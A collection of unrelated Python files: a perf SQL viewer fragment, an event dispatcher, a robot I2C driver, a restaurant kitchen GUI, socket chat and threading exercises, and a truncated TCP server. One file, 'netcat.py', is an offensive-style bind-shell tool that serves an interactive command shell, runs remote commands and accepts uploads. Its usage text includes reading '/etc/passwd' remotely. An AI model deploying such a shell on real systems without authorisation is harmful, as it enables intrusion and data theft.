f.seek(0)
header = f.read(7)
f.seek(pos)
magic = header[0:4]
if sys.version_info[0] == 2:
eclass = ord(header[4])
encoding = ord(header[5])
version = ord(header[6])
else:
eclass = header[4]
encoding = header[5]
version = header[6]
if magic == chr(127) + "ELF" and eclass > 0 and eclass < 3 and encoding > 0 and encoding < 3 and version == 1:
result = True if eclass == 2 else False
return result
# Global data
class Glb():
def __init__(self, dbref, db, dbname):
self.dbref = dbref
self.db = db
self.dbname = dbname
self.home_dir = os.path.expanduser("~")
self.buildid_dir = os.getenv("PERF_BUILDID_DIR")
if self.buildid_dir:
self.buildid_dir += "/.build-id/"
else:
self.buildid_dir = self.home_dir + "/.debug/.build-id/"
self.app = None
self.mainwindow = None
self.instances_to_shutdown_on_exit = weakref.WeakSet()
try:
self.disassembler = LibXED()
self.have_disassembler = True
except:
self.have_disassembler = False
def FileFromBuildId(self, build_id):
file_name = self.buildid_dir + build_id[0:2] + "/" + build_id[2:] + "/elf"
return TryOpen(file_name)
def FileFromNamesAndBuildId(self, short_name, long_name, build_id):
# Assume current machine i.e. no support for virtualization
if short_name[0:7] == "[kernel" and os.path.basename(long_name) == "kcore":
file_name = os.getenv("PERF_KCORE")
f = TryOpen(file_name) if file_name else None
if f:
return f
# For now, no special handling if long_name is /proc/kcore
f = TryOpen(long_name)
if f:
return f
f = self.FileFromBuildId(build_id)
if f:
return f
return None
def AddInstanceToShutdownOnExit(self, instance):
self.instances_to_shutdown_on_exit.add(instance)
# Shutdown any background processes or threads
def ShutdownInstances(self):
for x in self.instances_to_shutdown_on_exit:
try:
x.Shutdown()
except:
pass
# Database reference
class DBRef():
def __init__(self, is_sqlite3, dbname):
self.is_sqlite3 = is_sqlite3
self.dbname = dbname
def Open(self, connection_name):
dbname = self.dbname
if self.is_sqlite3:
db = QSqlDatabase.addDatabase("QSQLITE", connection_name)
else:
db = QSqlDatabase.addDatabase("QPSQL", connection_name)
opts = dbname.split()
for opt in opts:
if "=" in opt:
opt = opt.split("=")
if opt[0] == "hostname":
db.setHostName(opt[1])
elif opt[0] == "port":
db.setPort(int(opt[1]))
elif opt[0] == "username":
db.setUserName(opt[1])
elif opt[0] == "password":
db.setPassword(opt[1])
elif opt[0] == "dbname":
dbname = opt[1]
else:
dbname = opt
db.setDatabaseName(dbname)
if not db.open():
raise Exception("Failed to open database " + dbname + " error: " + db.lastError().text())
return db, dbname
# Main
def Main():
if (len(sys.argv) < 2):
printerr("Usage is: exported-sql-viewer.py {<database name> | --help-only}");
raise Exception("Too few arguments")
dbname = sys.argv[1]
if dbname == "--help-only":
app = QApplication(sys.argv)
mainwindow = HelpOnlyWindow()
mainwindow.show()
err = app.exec_()
sys.exit(err)
is_sqlite3 = False
try:
f = open(dbname, "rb")
if f.read(15) == b'SQLite format 3':
is_sqlite3 = True
f.close()
except:
pass
dbref = DBRef(is_sqlite3, dbname)
db, dbname = dbref.Open("main")
glb = Glb(dbref, db, dbname)
app = QApplication(sys.argv)
glb.app = app
mainwindow = MainWindow(glb)
glb.mainwindow = mainwindow
mainwindow.show()
err = app.exec_()
glb.ShutdownInstances()
db.close()
sys.exit(err)
if __name__ == "__main__":
Main()
|
dispatcher.py
|
import abc
import dataclasses
import random
import threading
import time
import typing
@dataclasses.dataclass
class Event:
name: str
data: dict
def __str__(self) -> str:
return f'<Event: {self.name} Data: {self.data}>'
class Runnable:
def __init__(self):
self._runner = threading.Thread(target=self.run)
self._is_running: bool = False
@abc.abstractmethod
def run(self) -> None:
raise NotImplementedError
def start(self) -> None:
self._is_running = True
self._runner.start()
def stop(self) -> None:
self._is_running = False
class EventsQueue:
def __init__(self, length) -> None:
self._length: int = length
self.__lock: threading.Lock = threading.Lock()
self._queue: typing.List[Event] = []
def push(self, event: Event) -> None:
if len(self._queue) < self._length:
with self.__lock:
self._queue.append(event)
else:
print('Exceeded queue maximum length!')
def pop(self):
if len(self._queue) > 0:
with self.__lock:
return self._queue.pop(0)
else:
return None
class Consumer:
def __init__(self, name: str) -> None:
self._name: str = name
def consume_event(self, event: Event) -> None:
print(f'Consumer {self._name} got event {event}!')
class Producer(Runnable):
def __init__(self, name: str):
super(Producer, self).__init__()
self._name: str = name
self._dispatcher: typing.Union['Dispatcher', None] = None
self._runner = threading.Thread(target=self.run)
def set_dispatcher(self, dispatcher: 'Dispatcher') -> None:
self._dispatcher: 'Dispatcher' = dispatcher
def run(self):
while self._is_running:
self.emit()
time.sleep(random.randint(a=1, b=10))
print(f'Running producer {self._name}...')
def emit(self):
self._dispatcher.push_event_to_queue(
Event(name=f'{self._name}',
data={'foo': random.randint(a=1, b=10)})
)
class Dispatcher(Runnable):
def __init__(self):
super(Dispatcher, self).__init__()
self._producers: typing.List[Producer] = []
self._consumers: typing.List[Consumer] = []
self._queue: EventsQueue = EventsQueue(100)
def run(self):
while self._is_running:
event = self._queue.pop()
if event:
self.__send_event_to_consumers(event)
time.sleep(1)
print('Running dispatcher...')
def push_event_to_queue(self, event: Event) -> None:
self._queue.push(event)
def add_producer(self, producer: Producer) -> None:
self._producers.append(producer)
def add_consumer(self, consumer: Consumer) -> None:
self._consumers.append(consumer)
def __send_event_to_consumers(self, event: Event) -> None:
for consumer in self._consumers:
consumer.consume_event(event)
def main():
dispatcher = Dispatcher()
p1 = Producer('Foo')
p2 = Producer('Bar')
p3 = Producer('Baz')
p1.set_dispatcher(dispatcher)
p2.set_dispatcher(dispatcher)
p3.set_dispatcher(dispatcher)
dispatcher.add_producer(p1)
dispatcher.add_producer(p2)
dispatcher.add_producer(p3)
dispatcher.add_consumer(Consumer('Kyle'))
dispatcher.add_consumer(Consumer('Andrew'))
dispatcher.add_consumer(Consumer('Luke'))
dispatcher.start()
p1.start()
p2.start()
p3.start()
if __name__ == '__main__':
main()
|
astar.py
|
# astar.py
# Source: https://github.com/DrGFreeman/RasPiBot202V2
#
# MIT License
#
# Copyright (c) 2017 Julien de la Bruere-Terreault <drgfreeman@tuta.io>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# This module defines the AStar class as a python interface to the Pololu
# A-Star 32U4 robot controller with Raspberry Pi bridge.
import time
import threading
import smbus
import struct
import sys
class AStar:
def __init__(self):
self._bus = smbus.SMBus(1)
self._version = sys.version_info.major
self.ledYellow = 0
self.ledGreen = 0
self.ledRed = 0
self._buttonA = 0
self._buttonB = 0
self._buttonC = 0
self._fwdSpeed = 0
self._turnRate = 0
self._lockSpeeds = False
self._x = 0
self._y = 0
self._phi = 0
self._lockOdometer = False
self._batteryMV = 0
self._lockBattery = False
self._panServo = 0 # Servo is disabled by default
self._tiltServo = 0 # Servo is disabled by default
self._mastServo = 0 # Servo is disabled by default
self._lockServos = False
self._notes = ''
self._resetOdometer = True
self.run()
# Wait to ensure we can read/write the buffer once before starting
time.sleep(.05)
# Print battery level
print("RPB202")
print("Battery level: " + str(round(self.getBatteryVolts(), 2)) + "V")
def _read_unpack(self, address, size, format):
"""Reads data from the I2C bus."""
self._bus.write_byte(20, address)
time.sleep(0.0001)
byte_list = [self._bus.read_byte(20) for _ in range(size)]
if self._version == 3:
# Python version 3
return struct.unpack(format, bytes(byte_list))
else:
# Python version 2
return struct.unpack(format, bytes(bytearray(byte_list)))
def _write_pack(self, address, format, *data):
"""Writes data to the I2C bus."""
if self._version == 3:
# Python version 3
data_array = list(struct.pack(format, *data))
else:
# Python version 2
data_array = map(ord, list(struct.pack(format, *data)))
self._bus.write_i2c_block_data(20, address, data_array)
time.sleep(0.0001)
def close(self):
"""Stops the I2C communication with the A-Star controller. This method
also stops the motors and turns off the A-Star LEDs."""
# Stop the running thread
self._active = False
# Stop the motors
self.setSpeeds(0, 0)
# Write the motors speeds directly to the I2C bus
self._write_pack(6, 'hh', 0, 0)
# Turn LEDs off
self.setYellowLED(0)
self.setGreenLED(0)
self.setRedLED(0)
# Write the LED values directly to the I2C bus
self._write_pack(0, 'BBB', 0, 0, 0)
def run(self):
"""Starts continuous I2C communication with A-Star controller in a
dedicated thread."""
self._active = True
th = threading.Thread(target = self._run, args = [])
th.start()
def _run(self):
"""Runs continuous I2C communication with A-Star controller. Runs as
long as AStar._active attribute is True. Call AStar.close() to stop the
thread."""
while self._active:
try:
# Read from buffer
# Buttons
self._buttonA, self._buttonB, self._buttonC = \
self._read_unpack(3, 3, '???')
# Odometer
self._lockOdometer = True
self._x, self._y, phi = self._read_unpack(10, 6, 'hhh')
# Convert phi reading from 1/1000 of radians to radians
self._phi = phi / 1000.
self._lockOdometer = False
# Battery level
self._lockBattery = True
self._batteryMV = self._read_unpack(17, 2, 'H')[0]
self._lockBattery = False
# Write to buffer
# Reset odometer on start-up
if self._resetOdometer:
self._resetOdometer = False
self._write_pack(16, 'B', 1)
time.sleep(.02)
else:
self._write_pack(16, 'B', 0)
# LEDs
self._write_pack(0, 'BBB', self.ledYellow, self.ledGreen, \
self.ledRed)
# Servos
self._lockServos = True
self._write_pack(34, 'HHH', self._panServo, self._tiltServo, \
self._mastServo)
self._lockServos = False
# Notes
if self._notes != "":
self._write_pack(19, 'B15s', 1, self._notes.encode('ascii'))
self._notes = ""
# Motors (turn rate in 1/1000 of radians / s)
self._lockSpeeds = True
turnRate = int(self._turnRate * 1000)
self._write_pack(6, 'hh', self._fwdSpeed, turnRate)
self._lockSpeeds = False
except IOError:
# Handle I2C communication error
raise IOError("IOError in AStar class")
self.close()
def buttonAIsPressed(self):
"""Returns True if the A-Star button A is pressed, False otherwise."""
return self._buttonA
def buttonBIsPressed(self):
"""Returns True if the A-Star button B is pressed, False otherwise."""
return self._buttonB
def buttonCIsPressed(self):
"""Returns True if the A-Star button C is pressed, False otherwise."""
return self._buttonC
def getBatteryVolts(self):
"""Returns the robot battery level in Volts."""
while self._lockBattery:
# Wait while battery attribute is locked
pass
return self._batteryMV / 1000.
def getOdometerPhi(self):
"""Returns the phi angle of the robot from the odometer in radians
(0 <= phi < 2*Pi). 0 corresponds to the robot pointing in the positive x
direction. The angle increases turning in direction of the positive y
axis (left turn).
"""
while self._lockOdometer:
# Wait while odometer attributes are locked
pass
return self._phi
def getOdometerXY(self):
"""Returns the x and y position of the robot from the odometer in mm."""
while self._lockOdometer:
# Wait while odometer attributes are locked
pass
return self._x, self._y
def setYellowLED(self, value = 0):
"""Sets the A-Star yellow led status (0 = Off, 1 = On)."""
if value == 0:
self.ledYellow = 0
else:
self.ledYellow = 1
def setGreenLED(self, value = 0):
"""Sets the A-Star green led status (0 = Off, 1 = On)."""
if value == 0:
self.ledGreen = 0
else:
self.ledGreen = 1
def setRedLED(self, value = 0):
"""Sets the A-Star red led status (0 = Off, 1 = On)."""
if value == 0:
self.ledRed = 0
else:
self.ledRed = 1
def setPanServo(self, us_4 = 0):
"""Sets the pan servo pulse width value in quarter-microseconds."""
while self._lockServos:
# Wait while servos attributes are locked
pass
self._panServo = us_4
def setTiltServo(self, us_4 = 0):
"""Sets the tilt servo pulse width value in quarter-microseconds."""
while self._lockServos:
# Wait while servos attributes are locked
pass
self._tiltServo = us_4
def setMastServo(self, us_4 = 0):
"""Sets the mast servo pulse width value in quarter-microseconds."""
while self._lockServos:
# Wait while servos attributes are locked
pass
self._mastServo = us_4
def playNotes(self, notes):
"""Play the specified notes on the A-Star buzzer. Refer to the Pololu
Buzzer documentation for details on how to use the buzzer."""
self._notes = notes
def resetOdometer(self):
"""Resets the odometer on the A-Star."""
self._resetOdometer = True
def setSpeeds(self, fwdSpeed = 0, turnRate = 0):
"""Sets the robot speed in mm/s and turn rate in radians/s"""
while self._lockSpeeds:
# Wait while speds attributes are locked
pass
self._fwdSpeed = fwdSpeed
self._turnRate = turnRate
|
netcat.py
|
#!/usr/bin/env python
import argparse
import socket
import shlex
import subprocess
import sys
import textwrap
import threading
def execute(cmd):
cmd = cmd.strip()
if not cmd:
return
output = subprocess.check_output(shlex.split(cmd), stderr=subprocess.STDOUT)
return output.decode()
class NetCat:
def __init__(self, args, buffer):
self.args = args
self.buffer = buffer
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def run(self):
if self.args.listen:
self.listen()
else:
self.send()
def send(self):
self.socket.connect((self.args.target, self.args.port))
if self.buffer:
self.socket.send(self.buffer)
try:
while True:
recv_len = 1
response = ''
while recv_len:
data = self.socket.recv(4096)
recv_len = len(data)
response += data.decode()
print(len(response))
if recv_len < 4096:
break
if response:
print(response)
buffer = input('> ')
buffer += '\n'
self.socket.send(buffer.encode())
except KeyboardInterrupt:
print('User terminated.')
self.socket.close()
sys.exit()
def listen(self):
print('listening')
self.socket.bind((self.args.target, self.args.port))
self.socket.listen(5)
while True:
client_socket, _ = self.socket.accept()
client_thread = threading.Thread(target=self.handle, args=(client_socket,))
client_thread.start()
def handle(self, client_socket):
if self.args.execute:
output = execute(self.args.execute)
client_socket.send(output.encode())
elif self.args.upload:
print('in upload')
file_buffer = b''
while True:
print('.')
data = client_socket.recv(4096)
if data:
print('+')
file_buffer += data
print(len(file_buffer))
else:
break
with open(self.args.upload, 'wb') as f:
f.write(file_buffer)
message = f'Saved file {self.args.upload}'
client_socket.send(message.encode())
elif self.args.command:
cmd_buffer = b''
while True:
try:
client_socket.send(b' #> ')
while '\n' not in cmd_buffer.decode():
cmd_buffer += client_socket.recv(64)
response = execute(cmd_buffer.decode())
if response:
client_socket.send(response.encode())
cmd_buffer = b''
except Exception as e:
print(f'server killed {e}')
self.socket.close()
sys.exit()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='BHP Net Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent('''Example:
netcat.py -t 192.168.1.108 -p 5555 -l -c # command shell
netcat.py -t 192.168.1.108 -p 5555 -l -u=mytest.whatisup # upload to file
netcat.py -t 192.168.1.108 -p 5555 -l -e=\"cat /etc/passwd\" # execute command
echo 'ABCDEFGHI' | ./netcat.py -t 192.168.1.108 -p 135 # echo local text to server port 135
netcat.py -t 192.168.1.108 -p 5555 # connect to server
'''))
parser.add_argument('-c', '--command', action='store_true', help='initialize command shell')
parser.add_argument('-e', '--execute', help='execute specified command')
parser.add_argument('-l', '--listen', action='store_true', help='listen')
parser.add_argument('-p', '--port', type=int, default=5555, help='specified port')
parser.add_argument('-t', '--target', default='127.0.0.1', help='specified IP')
parser.add_argument('-u', '--upload', help='upload file')
args = parser.parse_args()
if args.listen:
buffer = ''
else:
buffer = sys.stdin.read()
n = NetCat(args, buffer.encode())
n.run()
|
bingfa.py
|
import threading,time
import queue
# li=[1,2,3,4,5]
# def pri():
# while li:
# a=li[-1]
# print(a)
# time.sleep(1)
# try:
# li.remove(a)
# except Exception as e:
# print('----',a,e)
#
# if __name__ == '__main__':
# t1 = threading.Thread(target=pri, args=())
# t1.start()
# t2 = threading.Thread(target=pri, args=())
# t2.start()
# q=queue.LifoQueue()
#
# q.put(34)
# q.put(56)
# q.put(12)
#
# #优先级
# q=queue.PriorityQueue()
# q.put([5,100])
# q.put([7,200])
# q.put([3,"hello"])
# q.put([4,{"name":"alex"}])
# if __name__ == '__main__':
# while 1:
# data = q.get()
# print(data)
# from contextlib import contextmanager
#
#
# @contextmanager
# def make_context():
# print('enter')
# try:
# yield "ok"
# except RuntimeError as err:
# print( 'error', err)
# finally:
# print('exit')
# if __name__ == '__main__':
# with make_context() as value:
# print(value)
# def consumer(name):
# print("--->ready to eat baozi...")
# while True:
# new_baozi = yield
# print("[%s] is eating baozi %s" % (name,new_baozi))
# #time.sleep(1)
#
# def producer():
#
# r = con.__next__()
# r = con2.__next__()
# n = 0
# while 1:
# time.sleep(1)
# print("\033[32;1m[producer]\033[0m is making baozi %s and %s" %(n,n+1) )
# con.send(n)
# con2.send(n+1)
#
# n +=2
#
#
# if __name__ == '__main__':
# con = consumer("c1")
# con2 = consumer("c2")
# p = producer()
# from greenlet import greenlet
#
#
# def test1():
# print(12)
# gr2.switch()
# print(34)
# gr2.switch()
#
#
# def test2():
# print(56)
# gr1.switch()
# print(78)
#
#
# if __name__ == '__main__':
# gr1 = greenlet(test1)
# gr2 = greenlet(test2)
# gr1.switch()
import gevent
import requests,time
start=time.time()
def f(url):
print('GET: %s' % url)
resp =requests.get(url)
data = resp.text
print('%d bytes received from %s.' % (len(data), url))
gevent.joinall([
gevent.spawn(f, 'https://www.python.org/'),
gevent.spawn(f, 'https://www.yahoo.com/'),
gevent.spawn(f, 'https://www.baidu.com/'),
gevent.spawn(f, 'https://www.sina.com.cn/'),
])
print("cost time:",time.time()-start)
|
ThreadClient.py
|
#ThreadClient.py
from socket import *
import threading
sevip = '127.0.0.1'
sevport = 62581
address = (sevip, sevport)
mysock = socket(AF_INET, SOCK_STREAM)
print("connecting to server {} on port {}...".format(sevip, sevport))
mysock.connect(address)
print("connection complete")
print("If you want to leave chat, just type !quit\n")
def receive():
global mysock
while True:
data = mysock.recv(1024)
print(data.decode("UTF-8"), " *from Sever")
mysock.close()
thread_recv = threading.Thread(target = receive, args = ()) #쓰레드 생성
thread_recv.start() #쓰레드 시작
while True:
try:
data = input("")
except KeyboardInterrupt:
break
if data =='!quit': #!quit를 입력하면 while루프를 끝낸다.
break
mysock.send(bytes(data,"UTF-8"))
mysock.close()
print("disconnected")
|
kitchen.py
|
#kitchen.py
##############NETWORK CONFIG###############
import csv
import os
allfile = os.listdir()
def Save(data):
with open('config_kitchen.csv','w',newline='') as file:
#fw = 'file writer'
fw = csv.writer(file)
fw.writerows(data)
print('Save Done!')
def Read():
if 'config_kitchen.csv' not in allfile:
allip = [['kitchen','192.168.0.100',7000],['waiting','192.168.0.100',8000]]
Save(allip)
with open('config_kitchen.csv',newline='') as file:
#fr = 'file reader'
fr = csv.reader(file)
data = list(fr)
return data
readip = Read()
ip_kitchen = readip[0]
ip_waiting = readip[1]
kitchenip = ip_kitchen[1] # '192.168.0.133' #myip
kitchenport = int(ip_kitchen[2]) # 7800 #myport
waitingip = ip_waiting[1] # '192.168.0.133'
waitingport = int(ip_waiting[2]) # 7600
print('IP/PORT (kitchen): ',kitchenip,kitchenport)
print('IP/PORT: (waiting)',waitingip,waitingport)
##############NETWORK CONFIG###############
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
import socket
import threading
foodlist = {'1001':{'fid':'1001','name':'ไก่ไม่มีกระดูก','price':20},
'1002':{'fid':'1002','name':'ปลาแซลมอนย่างซีอิ้ว','price':50},
'1003':{'fid':'1003','name':'ไก่เผ็ด','price':45},
'1004':{'fid':'1004','name':'ข้าวยำไก่แซ็ป','price':60},
'1005':{'fid':'1005','name':'มันบด','price':15},
'1006':{'fid':'1006','name':'ปลากระพงทอด','price':70},
'1007':{'fid':'1007','name':'ข้าวเปล่า','price':10},
'1008':{'fid':'1008','name':'น้ำดื่ม','price':7},
'1009':{'fid':'1009','name':'น้ำส้ม','price':15},
'1010':{'fid':'1010','name':'น้ำอัดลม','price':25},
}
GUI = Tk()
GUI.geometry('1000x700')
GUI.title('Kitchen : โปรแกรมในครัว')
FONT = ('Angsana New',15)
def SettingIP(event=None):
GUI2 = Toplevel()
GUI2.geometry('500x500')
GUI2.title('กรุณาตั้งค่า ip ก่อนใช้งาน')
readip = Read()
ip_kitchen = readip[0]
ip_waiting = readip[1]
########################
L1 = ttk.Label(GUI2,text='Kitchen IP').pack(pady=10)
v_kitchenip = StringVar()
v_kitchenip.set(ip_kitchen[1])
E1 = ttk.Entry(GUI2,textvariable=v_kitchenip,font=FONT)
E1.pack(pady=10)
L2 = ttk.Label(GUI2,text='Kitchen Port').pack(pady=10)
v_kitchenport = StringVar()
v_kitchenport.set(ip_kitchen[2])
E2 = ttk.Entry(GUI2,textvariable=v_kitchenport,font=FONT)
E2.pack(pady=10)
########################
L3 = ttk.Label(GUI2,text='Waiting IP').pack(pady=10)
v_waitingip = StringVar()
v_waitingip.set(ip_waiting[1])
E3 = ttk.Entry(GUI2,textvariable=v_waitingip,font=FONT)
E3.pack(pady=10)
L4 = ttk.Label(GUI2,text='Waiting Port').pack(pady=10)
v_waitingport = StringVar()
v_waitingport.set(ip_waiting[2])
E4 = ttk.Entry(GUI2,textvariable=v_waitingport,font=FONT)
E4.pack(pady=10)
########################
def SaveSetting():
saveip = [['kitchen',v_kitchenip.get(),v_kitchenport.get()],
['waiting',v_waitingip.get(),v_waitingport.get()]]
Save(saveip)
messagebox.showinfo('บันทึก ip ใหม่','บันทึก ip ใหม่แล้ว!')
GUI2.withdraw()
B1 = ttk.Button(GUI2,text='Save',command=SaveSetting)
B1.pack(ipady=10,ipadx=20)
GUI2.mainloop()
GUI.bind('<F10>',SettingIP)
F1 = Frame(GUI)
F2 = Frame(GUI)
F3 = Frame(GUI)
F1.place(x=20,y=120)
F2.place(x=220,y=120)
F3.place(x=680,y=120)
################Zone1################
L11 = ttk.Label(F1,text='รายการคิว',font=FONT,foreground='green').pack()
header = ['Food Order No.','Quantity']
hw = [100,70]
table_order = ttk.Treeview(F1,height=25,column=header,show='headings')
table_order.pack()
for hd,w in zip(header,hw):
table_order.heading(hd,text=hd)
table_order.column(hd,width=w)
################Zone2################
L21 = ttk.Label(F2,text='รายการอาหาร',font=FONT,foreground='green').pack()
header = ['ID','Food Name','Price','Quantity','Total']
hw = [70,150,70,70,70] # | ID | Foodname | Price |xxxx
table_food = ttk.Treeview(F2,height=25,column=header,show='headings')
table_food.pack()
for hd,w in zip(header,hw):
table_food.heading(hd,text=hd)
table_food.column(hd,width=w)
################Zone3################
L31 = ttk.Label(F3,text='รายการคิวที่เสร็จแล้ว',font=FONT,foreground='green').pack()
header = ['Food Order No.','Quantity']
hw = [100,70]
table_finish = ttk.Treeview(F3,height=25,column=header,show='headings')
table_finish.pack()
for hd,w in zip(header,hw):
table_finish.heading(hd,text=hd)
table_finish.column(hd,width=w)
##########Button############
################Zone4################
FB = Frame(GUI)
FB.place(x=50,y=50)
B1 = ttk.Button(FB,text='อาหารเสร็จแล้ว')
B1.grid(row=0,column=0,ipadx=20,ipady=10,padx=10)
B2 = ttk.Button(FB,text='เคลียร์')
B2.grid(row=0,column=1,ipadx=20,ipady=10,padx=10)
###############SERVER##################
def ConverttoTable(data):
# data = 'k|1001=3,1002=2,1003=2'
# convert to = ['ID','Food Name','Price','Quantity','Total']
data = data.split('|')[2]
#print('Data:',data)
food = data.split(',')
#print('Food:',food)
allfood = []
for f in food:
fs = f.split('=')
fid = fs[0]
quan = fs[1]
dt = [fid,
foodlist[fid]['name'],
foodlist[fid]['price'],
quan,
int(foodlist[fid]['price']) * int(quan)]
allfood.append(dt)
print(allfood)
return allfood
global food_cooking
food_cooking = {}
global chef_cooking
chef_cooking = []
#chef_cooking = [1001,1002,1003]
def RunServer():
global chef_cooking
my_ip = kitchenip #'192.168.1.30'
port = kitchenport #7000
while True:
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
server.bind((my_ip,port))
server.listen(1)
print('Waiting for client...')
client, addr = server.accept()
print('Connected from: ',str(addr))
data = client.recv(1024).decode('utf-8') #k-Q1001-1001=3-1002=1-1007
#print(type(data))
if data[0] == 'k':
#table_order.insert('','end',value=[data[2:]])
ordernum = data.split('|')[1]
food_cooking[ordernum] = ConverttoTable(data) #add result to dictionary
if len(chef_cooking) == 0:
#หากไม่มีออร์เดอร์
ThreadSendtoWaiting('wl-'+ordernum)
v_current.set('#' + ordernum)
sumquan = []
for fc in food_cooking[ordernum]:
table_food.insert('','end',value=fc)
print('FC: ',fc)
sumquan.append(int(fc[3]))
print('ORDER NO.',ordernum,type(ordernum))
table_order.insert('','end',value=[ordernum,sum(sumquan)])
chef_cooking.append([ordernum,sum(sumquan)])
else:
sumquan = []
for fc in food_cooking[ordernum]:
print('FC: ',fc)
sumquan.append(int(fc[3]))
chef_cooking.append([ordernum,sum(sumquan)])
ThreadSendtoWaiting('wl-'+ordernum)
table_order.insert('','end',value=[ordernum,sum(sumquan)])
else:
print('<<<< message is not for kitchen >>>>')
print('Message from client: ',data)
client.send('We received your Message.'.encode('utf-8'))
client.close()
print('ALL FOOD COOKING: ',food_cooking)
# เชฟกำลังทำอะไรอยู่ให้เช็ค chef_cooking
# มีรายการอาหารอะไรบ้างให้เช็ค food_cooking
def Finish(event=None):
print('CHEF:',chef_cooking)
if len(chef_cooking) != 0:
del food_cooking[chef_cooking[0][0]] #[1001,3]
table_finish.insert('',0,value=chef_cooking[0]) # chef_cooking[0] = ['1001',3]
ThreadSendtoWaiting('fl-'+chef_cooking[0][0])
del chef_cooking[0]
table_food.delete(*table_food.get_children())
table_order.delete(*table_order.get_children())
for c in chef_cooking:
table_order.insert('','end',value=c)
#insert current food
if len(chef_cooking) > 0:
ordernum = chef_cooking[0][0]
v_current.set('#' + ordernum)
for fc in food_cooking[ordernum]:
table_food.insert('','end',value=fc)
if len(chef_cooking) == 0:
v_current.set('----ORDER NO.----')
else:
v_current.set('----ORDER NO.----')
GUI.bind('<F1>',Finish)
v_current = StringVar()
v_current.set('----ORDER NO.----')
currentorder = ttk.Label(GUI,textvariable=v_current)
currentorder.configure(font=(None,30,'bold'))
currentorder.configure(foreground='green')
currentorder.place(x=400,y=50)
def ShowFood(event=None):
select = table_order.selection() #เช็คว่าเราดับเบิลคลิกเลือกรายการไหน
data = table_order.item(select) #ดึงข้อมูลของรายการนั้นมา
v_current.set('#' + data['values'][0])
print('DATA:',data)
table_food.delete(*table_food.get_children())
for fc in food_cooking[data['values'][0]]:
table_food.insert('','end',value=fc)
def DeleteFood(event=None):
print('TEST DELETE')
select = table_order.selection() #เช็คว่าเราดับเบิลคลิกเลือกรายการไหน
data = table_order.item(select) #ดึงข้อมูลของรายการนั้นมา
print('DATA:',data)
for i,f in enumerate(chef_cooking):
#f = ['1001',3]
if f[0] == data['values'][0]:
del chef_cooking[i]
table_order.delete(*table_order.get_children())
ThreadSendtoWaiting('dl-' + data['values'][0])
try:
for c in chef_cooking:
table_order.insert('','end',value=c)
v_current.set('#' + chef_cooking[0][0])
table_food.delete(*table_food.get_children())
for fc in food_cooking[chef_cooking[0][0]]:
table_food.insert('','end',value=fc)
except:
v_current.set('----ORDER NO.----')
table_food.delete(*table_food.get_children())
table_order.bind('<Double-1>',ShowFood)
table_order.bind('<Delete>',DeleteFood)
def SendtoWaiting(data):
serverip = waitingip #'192.168.1.30'
port = waitingport #7500
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
server.connect((serverip,port))
server.send(data.encode('utf-8'))
data_server = server.recv(1024).decode('utf-8')
print('Data from Server: ', data_server)
server.close()
def ThreadSendtoWaiting(data):
task = threading.Thread(target=SendtoWaiting,args=(data,))
task.start()
def ThreadRunServer():
task = threading.Thread(target=RunServer)
task.start()
ThreadRunServer()
GUI.mainloop()
|
server.py
|
"""TCP Server module."""
import time
import socket
import select
import threading
from testplan.common.utils.timing import wait
class Server(object):
"""
A server that can send and receive messages over the session protocol.
Supports multiple connections.
:param host: The host address the server is bound to.
:type host: ``str``
:param port: The port the server is bound to.
:type port: ``str`` or ``int``
:param listen: Socket listen argument.
:type listen: ``int``
"""
def __init__(self, host="localhost", port=0, listen=1):
self._input_host = host
self._input_port = port
self._listen = listen
self._ip = None
self._port = None
self._listening = False
self._server = None
self._server_thread = None
self._lock = threading.Lock()
self._connection_by_fd = {}
self._fds = {}
self.active_connections = 0
self.accepted_connections = 0
@property
def host(self):
"""Input host provided."""
return self._input_host
@property
def ip(self):
"""IP retrieved from socket."""
return self._ip
@property
def port(self):
"""Port retrieved after binding."""
return self._port
@property
def socket(self):
"""
Returns the underlying ``socket`` object
"""
return self._server
def bind(self):
"""Bind to a socket."""
self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self._input_port != 0:
self._server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._server.bind((self._input_host, self._input_port))
self._ip, self._port = self._server.getsockname()
def serve(self, loop_sleep=0.005, listening_timeout=5):
"""Start serving connections."""
self._server_thread = threading.Thread(
target=self._serving, kwargs=dict(loop_sleep=loop_sleep)
)
self._server_thread.daemon = True
self._server_thread.start()
wait(lambda: self._listening, listening_timeout, raise_on_timeout=True)
def _serving(self, loop_sleep=0.005):
"""Listen for new inbound connections."""
self._server.listen(self._listen)
self._listening = True
inputs = [self._server]
outputs = []
while self._listening:
readable, writable, exceptional = select.select(
inputs, outputs, inputs
)
for sock in readable:
if sock is self._server:
# New connection
conn, client_addr = sock.accept()
inputs.append(conn)
self._connection_by_fd[conn.fileno()] = conn
self._fds[self.active_connections] = conn.fileno()
self.active_connections += 1
for sock in exceptional:
inputs.remove(sock)
sock.close()
time.sleep(loop_sleep)
self._remove_all_connections()
try:
self._server.shutdown(socket.SHUT_RDWR)
except:
pass
self._server.close()
def accept_connection(self, timeout=10, accept_connection_sleep=0.1):
"""
